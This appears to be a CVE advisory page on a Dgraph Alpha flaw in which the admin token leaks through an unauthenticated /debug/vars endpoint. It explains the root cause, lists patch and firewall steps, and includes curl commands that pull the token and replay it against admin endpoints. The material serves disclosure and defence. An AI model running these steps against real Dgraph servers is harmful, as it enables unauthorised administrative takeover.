Listen to this Post
CVE-2026-41492: Unauthenticated token leakage through `/debug/vars`.
Vulnerable Dgraph Alpha endpoints expose process command-line arguments.
The `–security token=…` flag supplies the Alpha admin token at startup.
Go’s `expvar` package automatically registers `/debug/vars` on `http.DefaultServeMux`.
The `x/metrics.go` file imports expvar, and Conf = expvar.NewMap("dgraph_config").
The `expvar` handler includes `cmdline = os.Args` in its JSON output.
Run.go explicitly blocks the old `/debug/pprof/cmdline` path.
A `if r.URL.Path == “/debug/pprof/cmdline”` check returns a 404 error.
Other paths fall through to http.DefaultServeMux, which serves /debug/vars.
An unauthenticated GET request to `/debug/vars` retrieves the full cmdline.
The attacker parses the JSON to extract the admin token from the command line.
The admin token is sent in the `X-Dgraph-AuthToken` header for any admin request.
Admin.go reads `X-Dgraph-AuthToken` and compares it to `worker.Config.AuthToken`.
No other authentication is required for admin-access after token replay.
This bypass allows privileged actions on admin-only endpoints.
The complete exploit was verified on Dgraph v25.3.2 running in a Docker container.
dailycve form:
Platform: Dgraph Alpha
Version: v25.3.2
Vulnerability: Incomplete fix, `/debug/vars` leak
Severity: Critical
date: 2026-04-24
Prediction: 2026-04-24 (already patched)
What Undercode Say:
Download the vulnerable Dgraph version docker pull dgraph/dgraph:v25.3.2 Simulate starting the Alpha node with a token docker run -d -p 8080:8080 --name dgraph_alpha_vuln dgraph/dgraph:v25.3.2 dgraph alpha --security "token=MySecretAdminToken" Exploit: Retrieve the cmdline from /debug/vars curl http://localhost:8080/debug/vars | jq '.cmdline' Extract the token, store it in a variable (manual extraction needed) TOKEN="SecretToken" Replay the token to access restricted admin endpoints curl -H "X-Dgraph-AuthToken: MySecretAdminToken" http://localhost:8080/admin/config/cache_mb
Exploit:
- Send an unauthenticated GET request to `http://target:8080/debug/vars`.
- Parse the response JSON, locate the “cmdline” string, and extract the
--security token=.... - Replay the extracted token in the `X-Dgraph-AuthToken` header for any admin-only endpoint.
Protection from this CVE:
Upgrade to Dgraph version `25.3.3` or higher.
Apply network access controls (e.g., a firewall) to restrict access to the Dgraph Alpha HTTP port (default 8080).
Use a reverse proxy to filter out paths like `/debug/vars` or implement allow-listing logic in the HTTP handler.
Impact:
Unauthenticated remote attackers can obtain the Alpha admin token, leading to full administrative account compromise. This enables reading sensitive configurations, modifying cluster settings, and performing any admin-gated action, effectively bypassing all authentication controls.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

